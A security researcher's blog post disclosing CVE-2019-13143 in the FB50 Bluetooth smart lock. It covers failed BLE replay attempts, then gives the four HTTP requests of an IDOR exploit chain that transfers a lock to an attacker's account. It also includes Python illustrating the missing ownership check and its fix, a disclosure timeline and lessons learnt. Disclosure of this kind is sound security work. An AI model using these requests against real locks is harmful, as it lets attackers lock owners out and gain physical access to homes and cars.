---
template: text.html
title: Picking the FB50 smart lock (CVE-2019-13143)
subtitle: … and lessons learnt in IoT security
date: 2019-08-05
---

# Picking the FB50 smart lock (CVE-2019-13143)
## … and lessons learnt in IoT security

(*originally posted at [SecureLayer7's Blog](http://blog.securelayer7.net/fb50-smart-lock-vulnerability-disclosure), with my edits*)

### The lock

The lock in question is the FB50 smart lock, manufactured by Shenzhen
Dragon Brother Technology Co. Ltd. It is sold under multiple brands
across many e-commerce sites, and has an estimated 15k+ users.

The lock pairs to a phone via Bluetooth, and requires the OKLOK app from
the Play/App Store to function. The app requires the user to create an
account before any further functionality is available. It also handles
fingerprint enrolment and unlocking from a distance via Bluetooth.

We decided to tackle two primary attack surfaces — Bluetooth (BLE)
and the Android app.

### Via Bluetooth Low Energy (BLE)

Android phones can capture Bluetooth (HCI) traffic; the option is found
under Developer Options in Settings. We performed around 4 "unlocks" from
the Android phone, as seen in the screenshot.

![wireshark packets](/static/img/bt_wireshark.png)

This is the value sent in the `Write` request:

![wireshark write req](/static/img/bt_ws_value.png)

We attempted replaying these requests using `gatttool` and `gattacker`,
but that didn't pan out, since the value being written was encrypted.[^1]

### Via the Android app

Reversing the app using `jd-gui`, `apktool` and `dex2jar` didn't get us too
far, since most of it was obfuscated. Why bother, when there is an easier
approach: intercepting the app's HTTP traffic with Burp Suite.

We captured and played around with a bunch of requests and responses,
and finally arrived at a working exploit chain.

### The exploit

The entire exploit is a 4-step process consisting of authenticated
HTTP requests:

1. Using the lock's MAC address (obtained via a simple Bluetooth scan in the
   vicinity), get the barcode and lock ID
2. Using the barcode, fetch the user ID
3. Using the lock ID and user ID, unbind the user from the lock
4. Provide a new name, the attacker's user ID and the MAC address to bind the
   attacker to the lock

This is what it looks like, in essence (personal info redacted).

#### Request 1

```
POST /oklock/lock/queryDevice

{"mac":"XX:XX:XX:XX:XX:XX"}
```

Response:

```
{
  "result":{
    "alarm":0,
    "barcode":"<BARCODE>",
    "chipType":"1",
    "createAt":"2019-05-14 09:32:23.0",
    "deviceId":"",
    "electricity":"95",
    "firmwareVersion":"2.3",
    "gsmVersion":"",
    "id":<LOCK ID>,
    "isLock":0,
    "lockKey":"69,59,58,0,26,6,67,90,73,46,20,84,31,82,42,95",
    "lockPwd":"000000",
    "mac":"XX:XX:XX:XX:XX:XX",
    "name":"lock",
    "radioName":"BlueFPL",
    "type":0
  },
  "status":"2000"
}
```

#### Request 2

```
POST /oklock/lock/getDeviceInfo

{"barcode":"https://app.oklok.com.cn/app.html?id=<BARCODE>"}
```

Response:

```
{
  "result":{
    "account":"email@some.website",
    "alarm":0,
    "barcode":"<BARCODE>",
    "chipType":"1",
    "createAt":"2019-05-14 09:32:23.0",
    "deviceId":"",
    "electricity":"95",
    "firmwareVersion":"2.3",
    "gsmVersion":"",
    "id":<LOCK ID>,
    "isLock":0,
    "lockKey":"69,59,58,0,26,6,67,90,73,46,20,84,31,82,42,95",
    "lockPwd":"000000",
    "mac":"XX:XX:XX:XX:XX:XX",
    "name":"lock",
    "radioName":"BlueFPL",
    "type":0,
    "userId":<USER ID>
  }
}
```

#### Request 3

```
POST /oklock/lock/unbind

{"lockId":"<LOCK ID>","userId":<USER ID>}
```

#### Request 4

```
POST /oklock/lock/bind

{"name":"newname","userId":<USER ID>,"mac":"XX:XX:XX:XX:XX:XX"}
```

### That's it! (& the scary stuff)

You should now have the lock transferred to your account. The severity of this
issue lies in the fact that the original owner completely loses access to
their lock. They can't even "rebind" to get it back, since the current owner
(the attacker) needs to authorize that.

To add to that, roughly 15,000 user accounts' info is exposed via IDOR
(insecure direct object reference). Ilja, a cool dude I met on Telegram,
noticed locks named "carlock", "garage", "MainDoor", etc.[^2] This is
terrifying.

*shudders*

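The root cause, as an added illustration that is neither the vendor's code nor the exploit from the PoC repo: a minimal in-memory model of the `unbind`, `bind` and `queryDevice` handlers, showing the missing ownership check beside the server-side fix. The endpoint and field names are taken from the requests above; the sample store, the user ids and the `session_user` parameter (the account the HTTP session is authenticated as) are assumptions for this example.

```python
def sample_store():
    # Constructed sample data, not real devices: one lock, bound to user 101.
    return {"AA:BB:CC:DD:EE:FF": {
        "id": 1, "barcode": "ABC123", "userId": 101, "name": "lock", "lockPwd": "000000",
        "lockKey": "69,59,58,0,26,6,67,90,73,46,20,84,31,82,42,95"}}

class Forbidden(Exception):
    """Caller is authenticated, but not allowed to act on this lock."""

def by_id(locks, lock_id):
    return next((l for l in locks.values() if l["id"] == lock_id), None)

def unbind_vulnerable(locks, session_user, lock_id, user_id):
    # As observed: session_user only proves some account is logged in; the
    # owner to remove comes from the request body and is never checked against it.
    lock = by_id(locks, lock_id)
    if lock is None or lock["userId"] != user_id:
        return False
    lock["userId"] = None
    return True

def unbind_fixed(locks, session_user, lock_id):
    # Fix: the owner comes from the server-side binding, not the request, and
    # must equal the caller; unknown ids get the same answer (no enumeration).
    lock = by_id(locks, lock_id)
    if lock is None or lock["userId"] != session_user:
        raise Forbidden("caller does not own lock %s" % lock_id)
    lock["userId"] = None
    return True

def bind_fixed(locks, session_user, mac, name):
    # Fix: only an unbound lock can be claimed, so a bound lock cannot be
    # taken over unless its owner has released it first.
    lock = locks.get(mac)
    if lock is None or lock["userId"] is not None:
        raise Forbidden("lock is not available for binding")
    lock["userId"], lock["name"] = session_user, name
    return True

def query_device_fixed(locks, session_user, mac):
    # Fix for the exposure: lockKey, lockPwd and barcode go only to the bound
    # owner; any other account sees just the device's public identity.
    lock = locks.get(mac)
    if lock is None:
        return None
    view = {"id": lock["id"], "name": lock["name"], "mac": mac}
    if lock["userId"] == session_user:
        view.update({k: lock[k] for k in ("barcode", "lockKey", "lockPwd")})
    return view
```

With the fixed handlers, step 3 of the chain fails for any account other than the owner, and step 1 no longer hands out the lock's key material to arbitrary callers.
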
### Proof of Concept

[PoC Video](https://twitter.com/icyphox/status/1158396372778807296)

[Exploit code](https://github.com/icyphox/pwnfb50)

### Disclosure timeline

- **26th June, 2019**: Issue discovered at SecureLayer7, Pune
- **27th June, 2019**: Vendor notified about the issue
- **2nd July, 2019**: CVE-2019-13143 reserved
- No response from vendor
- **2nd August, 2019**: Public disclosure

### Lessons learnt

**DO NOT**. Ever. Buy. A smart lock. You're better off with the "dumb" ones
with keys. With the IoT plague spreading, it brings in a large attack surface
to things that were otherwise "unhackable" (try hacking a "dumb" toaster).

The IoT security scene is rife with bugs from over 10 years ago, like
executable stack segments[^3], hardcoded keys, and poor development
practices in general.

Our existing threat models and scenarios have to be updated to factor
in these new exploitation possibilities. This also broadens the playing
field for cyber warfare and mass surveillance campaigns.

### Researcher info

This research was done at [SecureLayer7](https://securelayer7.net), Pune, IN by:

* Anirudh Oppiliappan (me)
* S. Raghav Pillai ([@_vologue](https://twitter.com/_vologue))
* Shubham Chougule ([@shubhamtc](https://twitter.com/shubhamtc))

[^1]: [This article](https://www.pentestpartners.com/security-blog/pwning-the-nokelock-api/) discusses a similar smart lock; in that case, the authors did break the encryption.
[^2]: Thanks to Ilja Shaposhnikov (@drakylar).
[^3]: [PDF](https://gsec.hitb.org/materials/sg2015/whitepapers/Lyon%20Yang%20-%20Advanced%20SOHO%20Router%20Exploitation.pdf)